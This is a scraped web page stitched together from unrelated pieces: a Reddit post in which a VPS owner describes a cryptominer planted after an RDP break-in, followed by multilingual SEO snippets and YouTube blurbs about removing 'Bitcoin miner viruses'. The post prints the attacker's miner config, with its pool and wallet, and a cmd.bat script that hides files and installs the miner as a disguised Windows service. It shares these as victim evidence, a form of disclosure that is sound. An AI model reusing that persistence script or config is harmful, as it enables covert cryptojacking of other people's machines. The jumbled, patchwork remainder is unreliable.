Bitcoin Miner Virus - Come rilevare e rimuoverlo ...

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero [link] [comments]

Vírus minerando bitcoins no meu computador! How to Remove BitcoinMiner BEWARE THE BITCOIN VIRUS! (Bitcoin Trojan Provention) What is Bitcoin Mining? - YouTube Do You Have A Bitcoin Mining Virus?  How To DETECT And ...

BitCoin miner virus or BitCoin mining virus is a dangerous malware that may use your CPU and/or GPU to obtain BitCoin cryptocurrency by mining illegally. Cryptocurrency miners keep hitting computers and trying to use their resources to generate revenue for their developers. Even though this type of infection is called BitCoinMiner, it does mine for digital currencies such as Monero ... Der CoinMiner-Virus missbraucht die Rechenleistung Ihres Computers, damit der Inhaber des Virus Geld mit aufwendigen Berechnungen verdient. Wie das Prinzip des BitCoin Mining genau funktioniert, erfahren Sie in diesem Praxistipp. Laden Sie sich das kostenlose Programm Malwarebytes Anti-Malware bei CHIP herunter und installieren Sie es. Hierbei handelt es sich um einen äußerst zuverlässigen ... La actividad maliciosa del virus se compone de ejecutar múltiples scripts maliciosos en la PC infectada por una puerta trasera que el Virus Bitcoin Miner ejecuta de antemano. Estos scripts tienen el propósito de conectar el virus a un servidor de control y mando. Si el virus de minería usa diferentes clases para ejecutar más scripts que permiten que se lleven a cabo varias acciones: Der Virus kann Ihre Browsersuche umleiten und persönliche Daten sammeln. Virus: Bitcoinminer.sx entfernen. Der Virus bitcoinminer.sx kommt selten alleine. Wahrscheinlich ist Ihr Rechner mit noch weiterer Schadsoftware infiziert. Um den Trojaner zu entfernen, laden Sie sich zuerst Malwarebytes Anti-Malware herunter und installieren das kostenlose Programm auf Ihrem PC. Mit diesem Programm ... Eine Krypto-Miner-Malware befällt Ihren PC oder andere Geräte wie ein gewöhnlicher Virus, beginnt dann aber damit, Ihr Gerät zum Berechnen einer digitalen Währung zu nutzen. Um etwa Bitcoins ...

[index] [36395] [16194] [39468] [39655] [30947] [13199] [21994] [16589] [48431] [30912]

Vírus minerando bitcoins no meu computador!

Olá! Notei uma lentidão no computador, provocada por um vírus que estava minerando Bitcoins no meu computador. Nesse vídeo você acompanha como resolvi o problema. Produção e Edição: Eu ... For more information: https://www.bitcoinmining.com and https://www.weusecoins.com What is Bitcoin Mining? Have you ever wondered how Bitcoin is generated? T... There's a horrible bitcoin mining virus spreading through Russia. This Russian Bitcoin Virus is stealing credit card info. Putin Adviser on bitcoin ransomeware : “In regions with lower bandwidth ... Remove bitcoin miner trojan Virus (Virus Removal Guide) Visit Site :- https://www.uninstallallpcvirus.com/remove-bitcoin-miner-trojan-virus-virus-removal-gui... Crypto-malware is one of the latest malware threats, and it's particularly insidious because, unlike ransomware, it can go about doing its work completely un...

#